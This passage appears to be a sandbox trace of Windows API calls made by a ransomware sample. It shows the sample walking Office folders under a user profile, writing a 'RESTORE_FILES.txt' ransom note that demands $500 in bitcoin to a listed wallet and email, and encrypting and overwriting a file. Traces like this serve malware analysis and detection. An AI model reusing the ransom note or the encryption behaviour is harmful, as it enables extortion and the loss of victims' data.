lpString2="Windows") returned -1 [0085.139] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.139] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.139] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.139] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.139] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\.") returned 73 [0085.139] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.139] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.140] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.140] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.140] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.140] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.140] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.140] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\..") returned 74 [0085.140] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.140] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.140] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.140] lstrcmpiW (lpString1="System", lpString2="Windows") returned -1 [0085.140] lstrcmpiW (lpString1="System", lpString2="Program Files") returned 1 [0085.140] lstrcmpiW (lpString1="System", lpString2="Program Files (x86)") returned 1 [0085.140] lstrcmpiW (lpString1="System", lpString2="$Recycle.bin") returned 1 [0085.140] lstrcmpiW (lpString1="System", lpString2="System Volume Information") returned -1 [0085.140] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System") returned 78 [0085.140] lstrcmpW (lpString1="System", lpString2=".") returned 1 [0085.140] lstrcmpW (lpString1="System", lpString2="..") returned 1 [0085.141] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\*") returned 80 [0085.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0085.141] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.141] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.141] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.141] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.141] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.141] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\.") returned 80 [0085.141] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.141] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.141] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.141] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.141] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.141] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.141] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.141] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\..") returned 81 [0085.141] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.141] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.141] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0085.141] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0085.141] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\RESTORE_FILES.txt") returned 96 [0085.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\system\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.142] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.142] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0085.143] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.143] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0085.143] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.143] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0085.143] CloseHandle (hObject=0x150) returned 1 [0085.143] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.143] lstrcmpiW (lpString1="User", lpString2="Windows") returned -1 [0085.143] lstrcmpiW (lpString1="User", lpString2="Program Files") returned 1 [0085.143] lstrcmpiW (lpString1="User", lpString2="Program Files (x86)") returned 1 [0085.143] lstrcmpiW (lpString1="User", lpString2="$Recycle.bin") returned 1 [0085.143] lstrcmpiW (lpString1="User", lpString2="System Volume Information") returned 1 [0085.144] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User") returned 76 [0085.144] lstrcmpW (lpString1="User", lpString2=".") returned 1 [0085.144] lstrcmpW (lpString1="User", lpString2="..") returned 1 [0085.144] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\*") returned 78 [0085.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0085.144] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.144] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.144] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.144] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.144] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.144] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\.") returned 78 [0085.144] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.144] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.144] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.144] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.144] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.144] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.144] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.144] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\..") returned 79 [0085.144] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.144] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.144] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0085.144] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0085.145] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\RESTORE_FILES.txt") returned 94 [0085.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\user\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.145] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.145] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0085.146] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.146] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0085.146] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.146] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0085.147] CloseHandle (hObject=0x150) returned 1 [0085.147] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.147] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.147] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\RESTORE_FILES.txt") returned 89 [0085.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.148] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.148] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.149] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.149] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.149] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.149] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.149] CloseHandle (hObject=0x14c) returned 1 [0085.150] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.150] lstrcmpiW (lpString1="ONetConfig", lpString2="Windows") returned -1 [0085.150] lstrcmpiW (lpString1="ONetConfig", lpString2="Program Files") returned -1 [0085.150] lstrcmpiW (lpString1="ONetConfig", lpString2="Program Files (x86)") returned -1 [0085.150] lstrcmpiW (lpString1="ONetConfig", lpString2="$Recycle.bin") returned 1 [0085.150] lstrcmpiW (lpString1="ONetConfig", lpString2="System Volume Information") returned -1 [0085.150] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig") returned 75 [0085.150] lstrcmpW (lpString1="ONetConfig", lpString2=".") returned 1 [0085.150] lstrcmpW (lpString1="ONetConfig", lpString2="..") returned 1 [0085.151] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\*") returned 77 [0085.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.151] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.151] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.151] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.151] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.151] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.151] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\.") returned 77 [0085.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.151] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.151] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.151] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.151] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.151] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.151] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.151] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\..") returned 78 [0085.151] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.151] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.151] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.151] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="Windows") returned -1 [0085.151] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="Program Files") returned -1 [0085.151] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="Program Files (x86)") returned -1 [0085.151] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="$Recycle.bin") returned 1 [0085.151] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="System Volume Information") returned -1 [0085.151] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig") returned 112 [0085.151] StrStrIW (lpFirst="350db95df4cbd94b2a1c300510e12e11.sig", lpSrch=".protected") returned 0x0 [0085.152] lstrcmpW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="RESTORE_FILES.txt") returned -1 [0085.152] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.152] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig") returned 112 [0085.168] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.sig", lpSrch=".txt") returned 0x0 [0085.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig") returned 112 [0085.168] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.sig", lpSrch=".rar") returned 0x0 [0085.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig") returned 112 [0085.168] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.sig", lpSrch=".zip") returned 0x0 [0085.168] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x80, lpOverlapped=0x0) returned 1 [0085.169] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.169] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x80, lpOverlapped=0x0) returned 1 [0085.169] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.169] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.170] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.170] CloseHandle (hObject=0x150) returned 1 [0085.170] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: 